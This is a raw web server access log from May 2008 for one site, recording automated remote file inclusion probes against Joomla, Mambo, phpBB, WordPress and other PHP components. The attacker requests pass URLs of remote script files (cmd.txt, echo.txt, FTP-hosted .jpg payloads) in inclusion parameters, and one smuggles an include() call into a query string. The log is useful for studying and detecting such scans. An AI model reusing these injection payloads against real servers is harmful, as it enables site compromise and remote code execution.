196.38.88.68 - - [05/May/2008:10:39:45 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:39:55 -0700] "GET /logs/access_080215.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:39:59 -0700] "GET //appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.242.98.48 - - [05/May/2008:10:40:00 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.98.48 - - [05/May/2008:10:40:01 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:40:27 -0700] "GET /logs/access_080118.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:40:36 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:40:39 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:40:42 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:40:49 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:10:40:49 -0700] "GET //login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:40:50 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:41:04 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:41:04 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.220.51 - - [05/May/2008:10:42:13 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [05/May/2008:10:42:13 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:10:42:24 -0700] "GET /logs/index.php?meio.php=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:10:42:25 -0700] "GET /index.php?meio.php=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 200 11590 "-" "libwww-perl/5.76" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:42:42 -0700] "GET /logs/access_080218.log/@scanhttp://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.115 - - [05/May/2008:10:42:49 -0700] "GET /logs/access.log HTTP/1.0" 200 253644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:43:18 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:43:35 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:43:36 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:43:59 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:44:43 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [05/May/2008:10:44:43 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:44:58 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:44:59 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:45:32 -0700] "GET /logs/access_080215.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:10:45:56 -0700] "GET /logs/access.log/index.php?go=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:10:46:00 -0700] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:10:46:01 -0700] "GET //blocks/block_site_map.php?root_folder_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:10:46:01 -0700] "GET /index.php?go=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.126 - - [05/May/2008:10:46:02 -0700] "GET /logs/index.php?go=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:46:05 -0700] "GET /logs/access_080118.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:46:08 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:46:09 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:46:24 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:46:24 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:46:25 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:46:25 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:10:46:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:10:46:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:46:44 -0700] "GET /logs/access_080312.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:46:44 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:46:48 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.17.101.27 - - [05/May/2008:10:47:23 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [05/May/2008:10:47:28 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [05/May/2008:10:47:28 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:48:22 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:48:22 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.207.204.13 - - [05/May/2008:10:48:38 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [05/May/2008:10:48:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [05/May/2008:10:48:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.177.157.209 - - [05/May/2008:10:49:05 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.177.157.209 - - [05/May/2008:10:49:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.177.157.209 - - [05/May/2008:10:49:10 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:49:22 -0700] "GET /logs/access_080324.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:49:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:50:06 -0700] "GET /logs/access_080321.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:50:08 -0700] "GET /logs/frag.php?exec=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:50:08 -0700] "GET /logs/frag.php?exec=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:50:08 -0700] "GET /frag.php?exec=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:50:08 -0700] "GET /frag.php?exec=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:50:34 -0700] "GET /logs/access_080120.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:50:35 -0700] "GET /?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:50:36 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 46126 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.21.158 - - [05/May/2008:10:50:48 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.60 - - [05/May/2008:10:50:50 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:51:02 -0700] "GET /logs/access_080311.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:10:51:05 -0700] "GET /logs/access_080309.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:51:41 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:51:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:10:52:04 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [05/May/2008:10:52:59 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [05/May/2008:10:53:01 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:10:53:01 -0700] "GET /logs//home.php?inc=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:10:53:01 -0700] "GET //home.php?inc=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.181 - - [05/May/2008:10:53:02 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:53:14 -0700] "GET /logs/access_080205.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:53:15 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:53:15 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.36.154.122 - - [05/May/2008:10:53:26 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:53:27 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:53:27 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:53:28 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:53:37 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [05/May/2008:10:53:37 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:10:54:06 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:10:54:07 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:54:15 -0700] "GET /logs/access_080110.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:54:28 -0700] "GET /logs/access_080120.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:54:28 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 46126 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:54:33 -0700] "GET /logs/access_080215.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:54:34 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 46126 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:10:54:34 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:10:54:34 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:10:54:42 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:10:54:51 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:10:54:51 -0700] "GET /logs/access_080309.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:55:06 -0700] "GET /logs/access_080118.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:10:55:36 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:10:55:41 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:10:55:41 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:56:07 -0700] "GET /logs/access_080120.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:56:07 -0700] "GET /logs/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 46126 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:10:56:24 -0700] "GET /logs/access_080309.log/?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:56:27 -0700] "GET /logs/access_080218.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:56:28 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:56:28 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:10:56:30 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:10:56:35 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:10:56:35 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:41 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:43 -0700] "GET /logs/access_080215.log/voir.php?inc=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:43 -0700] "GET /voir.php?inc=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:43 -0700] "GET /logs/voir.php?inc=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
